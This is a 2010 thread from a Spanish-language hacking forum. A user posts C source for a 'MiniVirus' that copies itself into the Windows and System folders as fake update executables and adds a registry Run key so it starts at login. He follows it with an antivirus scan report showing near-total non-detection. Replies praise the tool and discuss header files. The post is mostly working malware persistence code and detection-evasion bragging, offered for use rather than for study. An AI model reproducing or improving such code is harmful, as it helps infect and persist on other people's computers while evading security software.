Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

[source] MiniVirus [c0d3d p0is0n]

https://indetectables.net/viewtopic.php?t=26098

Página 1 de 1

[source] MiniVirus [c0d3d p0is0n]

Publicado: 01 Sep 2010, 13:34
por p0is0n-123
Estaba estudiando un poco,y quise seguir mis primeros pasos en VB,uno de mis primeros tools en vb fue un MiniVirus similar a este...
Ahy les dejo el codigo en C,recuerden, no es malicioso,peor no lo pasen que esta feo...

Código: Seleccionar todo

#include <stdio.h>
#include <string.h>
#include <windows.h>
char WinDirec[260];
char SysDirec[260];
HKEY poison;
////////////////Agradecimientos a ps1c0s1s/////////////////////////
/////////////// c0d3d p0is0n-123//////////////////////////////////
int main(int argc, char *argv[])
{
GetWindowsDirectory(WinDirec,260);
strcat(WinDirec,"\\update.exe");     
CopyFile(argv[0],WinDirec,FALSE);
RegOpenKey("HKEY_CURRENT_USER","Software\\Microsoft\\Windows\\CurrentVersion\\Run",&poison);
RegSetValue(poison,"CSECTION",0,WinDirec,0);
RegCloseKey(poison);
GetSystemDirectory(SysDirec,sizeof(SysDirec));
strcat(SysDirec,"\\updt.exe");
CopyFile(argv[0],SysDirec,FALSE);
}
File Info

Report date: 2010-09-01 15:08:31 (GMT 1)
File name: virusprueba-exe
File size: 22720 bytes
MD5 Hash: dddd65390b935cfce77c20c253d94fb0
SHA1 Hash: 1eb9f7338c2022a9268be300d2125d36d64b77fe
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/Oficla.F.gen!Eldorado
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
[Enlace externo eliminado para invitados]
DP: Esa Mancha de F-PROT me da jordera ver en donde esta,pero de seguro salata por heuristica al ver el registro y el Copy....


Salu2

Re: MiniVirus [c0d3d p0is0n]

Publicado: 01 Sep 2010, 15:50
por ps1c0s1s
gracias loco , a alguien seguro le interesa ;) y lo que me gusta de vos es que vos Si sos uno de lo que hace sus propias tools :) saludos

Re: MiniVirus [c0d3d p0is0n]

Publicado: 01 Sep 2010, 18:13
por ØnLy
Bien p0ison avansas muy rapido bro.....
Saludos!

Re: MiniVirus [c0d3d p0is0n]

Publicado: 02 Sep 2010, 03:44
por DARK_J4V13R
Muy bueno bro, pero recuerda que si utilizas strcat tienes que colocar el header string.h.

Bendiciones ¡!

Re: MiniVirus [c0d3d p0is0n]

Publicado: 02 Sep 2010, 13:31
por ps1c0s1s
DARK_J4V13R
Muy bueno bro, "pero recuerda que si utilizas strcat tienes que colocar el header string.h"

Bendiciones ¡!
a ver .. eso es como preguntar "si uso strcat tengo que colocar el header string.h si o si "?

y la respuesta seria , esa pregunta es un tanto... ejemplo , que sistema operativo usas ?
simplemente dime que SO usas y te digo como averiguar eso de cualquier funcion y libreria pero bueno , la respuesta es "formalmente si" o sea DARK_J4V13R es formalmente necesario, pero dependiendo de las circunstancias no tiene por que ser indispensable si usas los entornos de desarrollo de m$oft, tienen la mala costumbre de a veces incluir automáticamente ciertas cabeceras y es posible que string.h sea una de ellas si compilas sin el include y funciona, es culpa del compilador .

De toda forma esta bien lo de poison porque de todas forma la dejo incluida..

En fin el uso "formalmente si" pero no indispensable! saludos
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB